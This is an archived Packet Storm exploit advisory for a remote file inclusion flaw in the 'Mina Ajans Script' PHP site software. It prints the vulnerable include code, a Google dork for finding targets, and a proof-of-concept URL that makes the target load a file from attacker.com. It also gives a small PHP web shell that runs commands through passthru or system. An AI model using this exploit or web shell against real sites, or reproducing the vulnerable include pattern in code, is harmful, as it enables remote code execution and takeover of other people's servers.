mina-rfi.txt

2007-02-06T00:00:00
ID PACKETSTORM:54210
Type packetstorm
Reporter Gokhan
Modified 2007-02-06T00:00:00

Description

                                        
                                            `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
$  
$  
$ Title : Mina Ajans Script Remote File Inclusion Vuln.  
$ Author : CanberX , BLaCKWHITE  
$ Free : NOT :(  
$ Disb : www.minaajans.com.tr  
$ G. Dork : "Tasarim ve program: Mina Ajans."  
$  
$ Vuln Code :  
""""""""""""""""""""""""""""""""""""""""""""  
<?  
$_GET["syf"];  
include_once $syf;  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ PoC : http://target.com/[vuln_file].php?syf=http://attacker.com/cmd.txt?cmd=id  
$  
$ CMD Ex. :  
""""""""""""""""""""""""""""""""""""""""""""  
<?php  
error_reporting(0);  
$cmd=$_GET["cmd"];  
include $cmd;  
passthru($cmd); // if passthru disabled then use @system("string");  
?>  
""""""""""""""""""""""""""""""""""""""""""""  
$ CanberX , BLaCKWHITE  
$  
$ gr33tz: BLaSTeR  
$  
$ web: canberx.uni.cc & blackwhite.tc & bl4ster.net  
$  
$ Don't be n00b!..  
$  
$  
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$  
`